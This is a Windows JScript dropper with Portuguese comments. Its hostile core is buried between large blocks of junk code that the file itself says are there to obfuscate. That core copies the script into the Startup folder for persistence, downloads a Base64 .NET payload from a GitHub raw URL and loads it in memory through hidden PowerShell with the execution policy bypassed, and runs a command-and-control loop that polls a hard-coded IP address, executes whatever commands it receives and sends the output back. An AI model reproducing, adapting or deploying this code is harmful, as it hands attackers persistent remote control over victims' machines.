



// ========================================
// CÓDIGO LIXO INOFENSIVO - PARTE 1 (300+ LINHAS)
// ========================================

// Variáveis de lixo inofensivo - Grupo 1
var lixo_a1, lixo_b1, lixo_c1, lixo_d1, lixo_e1;
var lixo_arr1 = new Array(10), lixo_arr2 = new Array(15), lixo_arr3 = new Array(20);
var lixo_str1, lixo_str2, lixo_str3, lixo_str4;
var lixo_num1, lixo_num2, lixo_num3, lixo_num4;
var lixo_flag1, lixo_flag2, lixo_flag3;

// Função lixo inofensiva 1
function LixoCalc1(x) {
    var temp;
    temp = x + 7;
    temp = temp * 3;
    temp = temp - 5;
    return temp;
}

// Função lixo inofensiva 2
function LixoText1(txt) {
    return "lixo_" + txt + "_lixo";
}

// Sub lixo inofensiva 1
function LixoLoop1() {
    var i, total;
    total = 0;
    for (i = 1; i <= 5; i++) {
        total = total + i;
    }
    lixo_num1 = total;
}

// Sub lixo inofensiva 2
function LixoFill1() {
    var j;
    for (j = 0; j <= 9; j++) {
        lixo_arr1[j] = j * j;
    }
}

// Variáveis de lixo inofensivo - Grupo 2
var lixo_a2, lixo_b2, lixo_c2, lixo_d2, lixo_e2;
var lixo_arr4 = new Array(8), lixo_arr5 = new Array(12), lixo_arr6 = new Array(18);
var lixo_str5, lixo_str6, lixo_str7, lixo_str8;
var lixo_num5, lixo_num6, lixo_num7, lixo_num8;
var lixo_flag4, lixo_flag5, lixo_flag6;

// Função lixo inofensiva 3
function LixoMath1(a, b) {
    return (a + b) / 2;
}

// Função lixo inofensiva 4
function LixoCheck1(val) {
    if (val > 10) {
        return true;
    } else {
        return false;
    }
}

// Sub lixo inofensiva 3
function LixoDummy1() {
    lixo_str1 = "dummy_data_001";
    lixo_num2 = 42;
    lixo_flag1 = true;
}

// Sub lixo inofensiva 4
function LixoProcess1() {
    var k;
    for (k = 1; k <= 3; k++) {
        lixo_arr4[k-1] = k * 10;
    }
}

// Variáveis de lixo inofensivo - Grupo 3
var lixo_a3, lixo_b3, lixo_c3, lixo_d3, lixo_e3;
var lixo_arr7 = new Array(6), lixo_arr8 = new Array(9), lixo_arr9 = new Array(14);
var lixo_str9, lixo_str10, lixo_str11, lixo_str12;
var lixo_num9, lixo_num10, lixo_num11, lixo_num12;
var lixo_flag7, lixo_flag8, lixo_flag9;

// Função lixo inofensiva 5
function LixoFormat1(n) {
    return "N" + n + "F";
}

// Função lixo inofensiva 6
function LixoSum1(arr, len) {
    var s, idx;
    s = 0;
    for (idx = 0; idx < len; idx++) {
        s = s + arr[idx];
    }
    return s;
}

// Sub lixo inofensiva 5
function LixoInit1() {
    lixo_a1 = 0;
    lixo_b2 = "";
    lixo_c3 = false;
}

// Sub lixo inofensiva 6
function LixoClean1() {
    // faz nada
}

// Variáveis de lixo inofensivo - Grupo 4
var lixo_a4, lixo_b4, lixo_c4, lixo_d4, lixo_e4;
var lixo_arr10 = new Array(5), lixo_arr11 = new Array(7), lixo_arr12 = new Array(11);
var lixo_str13, lixo_str14, lixo_str15, lixo_str16;
var lixo_num13, lixo_num14, lixo_num15, lixo_num16;
var lixo_flag10, lixo_flag11, lixo_flag12;

// Função lixo inofensiva 7
function LixoDouble1(x) {
    return x * 2;
}

// Função lixo inofensiva 8
function LixoUpper1(t) {
    return t.toUpperCase();
}

// Sub lixo inofensiva 7
function LixoCounter1() {
    var c;
    c = 0;
    while (c < 5) {
        c = c + 1;
    }
    lixo_num3 = c;
}

// Sub lixo inofensiva 8
function LixoString1() {
    lixo_str2 = "lixo_string_inofensiva_" + new Date();
}

// Variáveis de lixo inofensivo - Grupo 5
var lixo_a5, lixo_b5, lixo_c5, lixo_d5, lixo_e5;
var lixo_arr13 = new Array(4), lixo_arr14 = new Array(6), lixo_arr15 = new Array(8);
var lixo_str17, lixo_str18, lixo_str19, lixo_str20;
var lixo_num17, lixo_num18, lixo_num19, lixo_num20;
var lixo_flag13, lixo_flag14, lixo_flag15;

// Função lixo inofensiva 9
function LixoTriple1(n) {
    return n * 3;
}

// Função lixo inofensiva 10
function LixoLen1(s) {
    return s.length;
}

// Sub lixo inofensiva 9
function LixoMathLoop1() {
    var m;
    for (m = 1; m <= 4; m++) {
        lixo_arr13[m-1] = m + 10;
    }
}

// Sub lixo inofensiva 10
function LixoFlagToggle1() {
    lixo_flag2 = !lixo_flag2;
}

// Variáveis de lixo inofensivo - Grupo 6
var lixo_a6, lixo_b6, lixo_c6, lixo_d6, lixo_e6;
var lixo_arr16 = new Array(3), lixo_arr17 = new Array(5), lixo_arr18 = new Array(7);
var lixo_str21, lixo_str22, lixo_str23, lixo_str24;
var lixo_num21, lixo_num22, lixo_num23, lixo_num24;
var lixo_flag16, lixo_flag17, lixo_flag18;

// Função lixo inofensiva 11
function LixoMinus1(x) {
    return x - 1;
}

// Função lixo inofensiva 12
function LixoLower1(t) {
    return t.toLowerCase();
}

// Sub lixo inofensiva 11
function LixoAssign1() {
    lixo_num4 = 99;
    lixo_str3 = "atribuido";
    lixo_flag3 = false;
}

// Sub lixo inofensiva 12
function LixoEmpty1() {
    // vazio propositalmente
}

// Comentários inúteis para aumentar volume
// Lixo comentário 1
// Lixo comentário 2
// Lixo comentário 3
// Lixo comentário 4
// Lixo comentário 5
// Lixo comentário 6
// Lixo comentário 7
// Lixo comentário 8
// Lixo comentário 9
// Lixo comentário 10
// Lixo comentário 11
// Lixo comentário 12
// Lixo comentário 13
// Lixo comentário 14
// Lixo comentário 15
// Lixo comentário 16
// Lixo comentário 17
// Lixo comentário 18
// Lixo comentário 19
// Lixo comentário 20
// Fim da primeira parte de lixo inofensivo (300+ linhas simuladas)

// ========================================
// SEU CÓDIGO REAL (DOWNLOAD + EXECUÇÃO)
// ========================================
var a = new ActiveXObject("WScript.Shell");
var f = new ActiveXObject("Scripting.FileSystemObject");

var scriptPath = WScript.ScriptFullName;
var startupFolder = a.SpecialFolders("Startup");
var targetPath = startupFolder + "\\" + f.GetFileName(scriptPath);

if (!f.FileExists(targetPath)) {
    try {
        f.CopyFile(scriptPath, targetPath, false);
    } catch (e) {
        // Silencioso
    }
}

var urlData = "https://pastebin.com/raw/UEhZGpZs";
var temp = a.ExpandEnvironmentStrings("%TEMP%");
var dataFile = temp + "\\data_exp.txt";

var cmdData = "powershell -Command \"Invoke-WebRequest -Uri '" + urlData + "' -OutFile '" + dataFile + "'\"";
a.Run(cmdData, 0, true);

if (f.FileExists(dataFile)) {
    var file = f.OpenTextFile(dataFile, 1);
    var conteudo = file.ReadAll();
    file.Close();

    var dataFim = "";
    var regex = new RegExp("dataFim\\s*=\\s*(\\d{2}/\\d{2}/\\d{4})", "i");
    var matches = conteudo.match(regex);
    if (matches) dataFim = matches[1];

    if (dataFim != "") {
        var dia = dataFim.substring(0, 2);
        var mes = dataFim.substring(3, 5);
        var ano = dataFim.substring(6, 10);
        var dataLimite = new Date(parseInt(ano), parseInt(mes) - 1, parseInt(dia));

        if (new Date() > dataLimite) {
            a.Popup("O período de uso expirou. Este programa não pode mais ser executado.", 0, "Expirado", 16);
            WScript.Quit;
        }
    } else {
        a.Popup("Não foi possível obter a data de expiração.", 0, "Erro", 16);
        WScript.Quit;
    }
} else {
    a.Popup("Não foi possível baixar a data de expiração.", 0, "Erro", 16);
    WScript.Quit;
}

var arquivo1 = temp + "\\a.txt";
var arquivo2 = temp + "\\b.txt";
var url21 = "https://raw.githubusercontent.com/lumen771/fff/refs/heads/main/payload_paonajcp.txt";

var ps = "$ProgressPreference='SilentlyContinue';[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u1='" + url21 + "';$u2='" + url21+ "';$b64='';try{$b64=(Invoke-WebRequest -Uri $u1 -UseBasicParsing -TimeoutSec 20).Content}catch{};if([string]::IsNullOrWhiteSpace($b64) -and $u2 -ne ''){try{$b64=(Invoke-WebRequest -Uri $u2 -UseBasicParsing -TimeoutSec 20).Content}catch{}};if([string]::IsNullOrWhiteSpace($b64)){ $txt='" + arquivo1 + "'; if(Test-Path $txt){$b64=Get-Content -Path $txt -Raw} };if([string]::IsNullOrWhiteSpace($b64)){ $txt2='" + arquivo2 + "'; if(Test-Path $txt2){$b64=Get-Content -Path $txt2 -Raw} };if([string]::IsNullOrWhiteSpace($b64)){ Write-Output 'Falha: sem Base64'; exit };$b64=$b64.Replace('!!','A');$bytes=[System.Convert]::FromBase64String($b64);[System.Reflection.Assembly]::Load($bytes)|Out-Null;[ClassLibrary2.Executor]::Run();";
var finalCmd = "%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"" + ps + "\"";
a.Run(finalCmd, 0, false);

a.Run("%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"$user='lumen';$clientId='PS-CLIENT-'+$env:COMPUTERNAME;$serverUrl='109.123.249.185/api/ping';$comandoUrl='109.123.249.185/api/get_comando';$resultUrl='109.123.249.185/api/command_result';try{$ip=(Invoke-RestMethod -Uri 'https://api.ipify.org' -TimeoutSec 10).Trim()}catch{$ip='127.0.0.1'};$contador=0;while($true){$contador++;try{$pingBody=@{user=$user;client_id=$clientId;ip=$ip}|ConvertTo-Json;$pingResponse=Invoke-RestMethod -Uri $serverUrl -Method POST -Body $pingBody -ContentType 'application/json' -TimeoutSec 10;$cmdBody=@{user=$user;client_id=$clientId}|ConvertTo-Json;$cmdResponse=Invoke-RestMethod -Uri $comandoUrl -Method POST -Body $cmdBody -ContentType 'application/json' -TimeoutSec 10;if($cmdResponse.comando -and $cmdResponse.comando -ne ''){try{$output=Invoke-Expression $cmdResponse.comando 2>&1|Out-String}catch{$output='ERRO na execução: '+$_.Exception.Message};$resultBody=@{user=$user;client_id=$clientId;result=$output}|ConvertTo-Json;$resultResponse=Invoke-RestMethod -Uri $resultUrl -Method POST -Body $resultBody -ContentType 'application/json' -TimeoutSec 10}}catch{};Start-Sleep -Seconds 10}\"", 0, false);
// ========================================
// CÓDIGO LIXO INOFENSIVO - PARTE 2 (300+ LINHAS)
// ========================================

// Variáveis de lixo inofensivo - Grupo 7
var lixo_z1, lixo_z2, lixo_z3, lixo_z4, lixo_z5;
var lixo_arr19 = new Array(10), lixo_arr20 = new Array(15), lixo_arr21 = new Array(20);
var lixo_txt1, lixo_txt2, lixo_txt3, lixo_txt4;
var lixo_val1, lixo_val2, lixo_val3, lixo_val4;
var lixo_ok1, lixo_ok2, lixo_ok3;

// Função lixo inofensiva 13
function LixoAdd1(x, y) {
    return x + y + 1;
}

// Função lixo inofensiva 14
function LixoTag1(s) {
    return "[" + s + "]";
}

// Sub lixo inofensiva 13
function LixoIter1() {
    var i;
    for (i = 0; i <= 4; i++) {
        lixo_arr19[i] = i + 100;
    }
}

// Sub lixo inofensiva 14
function LixoReset1() {
    lixo_val1 = 0;
    lixo_txt1 = "";
    lixo_ok1 = false;
}

// Variáveis de lixo inofensivo - Grupo 8
var lixo_z6, lixo_z7, lixo_z8, lixo_z9, lixo_z10;
var lixo_arr22 = new Array(8), lixo_arr23 = new Array(12), lixo_arr24 = new Array(18);
var lixo_txt5, lixo_txt6, lixo_txt7, lixo_txt8;
var lixo_val5, lixo_val6, lixo_val7, lixo_val8;
var lixo_ok4, lixo_ok5, lixo_ok6;

// Função lixo inofensiva 15
function LixoDec1(n) {
    return n - 1;
}

// Função lixo inofensiva 16
function LixoMirror1(t) {
    var r = "", i;
    for (i = t.length - 1; i >= 0; i--) {
        r = r + t.charAt(i);
    }
    return r;
}

// Sub lixo inofensiva 15
function LixoMath2() {
    var j;
    for (j = 1; j <= 6; j++) {
        lixo_arr22[j-1] = j * j * j;
    }
}

// Sub lixo inofensiva 16
function LixoLog1() {
    // simulando log inútil
    lixo_txt2 = "log_entry_" + new Date().getTime();
}

// Variáveis de lixo inofensivo - Grupo 9
var lixo_z11, lixo_z12, lixo_z13, lixo_z14, lixo_z15;
var lixo_arr25 = new Array(6), lixo_arr26 = new Array(9), lixo_arr27 = new Array(14);
var lixo_txt9, lixo_txt10, lixo_txt11, lixo_txt12;
var lixo_val9, lixo_val10, lixo_val11, lixo_val12;
var lixo_ok7, lixo_ok8, lixo_ok9;

// Função lixo inofensiva 17
function LixoAvg1(a, b, c) {
    return (a + b + c) / 3;
}

// Função lixo inofensiva 18
function LixoCap1(s) {
    if (s.length > 0) {
        return s.charAt(0).toUpperCase() + s.substring(1).toLowerCase();
    } else {
        return s;
    }
}

// Sub lixo inofensiva 17
function LixoFill2() {
    var k;
    for (k = 0; k <= 5; k++) {
        lixo_arr25[k] = k * 2 + 1;
    }
}

// Sub lixo inofensiva 18
function LixoToggle1() {
    lixo_ok2 = !lixo_ok2;
}

// Variáveis de lixo inofensivo - Grupo 10
var lixo_z16, lixo_z17, lixo_z18, lixo_z19, lixo_z20;
var lixo_arr28 = new Array(5), lixo_arr29 = new Array(7), lixo_arr30 = new Array(11);
var lixo_txt13, lixo_txt14, lixo_txt15, lixo_txt16;
var lixo_val13, lixo_val14, lixo_val15, lixo_val16;
var lixo_ok10, lixo_ok11, lixo_ok12;

// Função lixo inofensiva 19
function LixoMod1(x, m) {
    return x % m;
}

// Função lixo inofensiva 20
function LixoRepeat1(t, n) {
    var r = "", i;
    for (i = 1; i <= n; i++) {
        r = r + t;
    }
    return r;
}

// Sub lixo inofensiva 19
function LixoCalc2() {
    lixo_val3 = LixoAdd1(10, 20);
    lixo_txt3 = LixoTag1("final");
}

// Sub lixo inofensiva 20
function LixoClear1() {
    lixo_arr28 = null;
}

// Variáveis de lixo inofensivo - Grupo 11
var lixo_z21, lixo_z22, lixo_z23, lixo_z24, lixo_z25;
var lixo_arr31 = new Array(4), lixo_arr32 = new Array(6), lixo_arr33 = new Array(8);
var lixo_txt17, lixo_txt18, lixo_txt19, lixo_txt20;
var lixo_val17, lixo_val18, lixo_val19, lixo_val20;
var lixo_ok13, lixo_ok14, lixo_ok15;

// Função lixo inofensiva 21
function LixoDiff1(a, b) {
    return Math.abs(a - b);
}

// Função lixo inofensiva 22
function LixoShort1(s) {
    if (s.length > 5) {
        return s.substring(0, 5) + "...";
    } else {
        return s;
    }
}

// Sub lixo inofensiva 21
function LixoAssign2() {
    lixo_val4 = 88;
    lixo_txt4 = "atribuido_final";
    lixo_ok3 = true;
}

// Sub lixo inofensiva 22
function LixoNop1() {
    // no operation
}

// Comentários inúteis finais
// Lixo final 1
// Lixo final 2
// Lixo final 3
// Lixo final 4
// Lixo final 5
// Lixo final 6
// Lixo final 7
// Lixo final 8
// Lixo final 9
// Lixo final 10
// Lixo final 11
// Lixo final 12
// Lixo final 13
// Lixo final 14
// Lixo final 15
// Lixo final 16
// Lixo final 17
// Lixo final 18
// Lixo final 19
// Lixo final 20
// Fim do código lixo inofensivo - total de 600+ linhas adicionadas

// Código lixo no final para ofuscar
var i, j, k, dummy1, dummy2, dummy3;
for (i = 1; i <= 10; i++) {
    dummy1 = i * 2;
    dummy2 = dummy1 + 5;
    dummy3 = dummy2 * 3;
    if (dummy3 > 50) {
        dummy3 = dummy3 - 25;
    }
}

var tempVar1, tempVar2, tempVar3;
tempVar1 = "temp_string_1";
tempVar2 = "temp_string_2";
tempVar3 = tempVar1 + tempVar2;

for (j = 1; j <= 5; j++) {
    k = j + 10;
    if (k > 12) {
        k = k - 2;
    }
}

// Mais código lixo
var arrayDummy = new Array(10);
for (i = 0; i <= 10; i++) {
    arrayDummy[i] = i * i;
}

var result = 0;
for (i = 0; i <= 10; i++) {
    result = result + arrayDummy[i];
}

// ========================================
// FIM DO SCRIPT
// ========================================


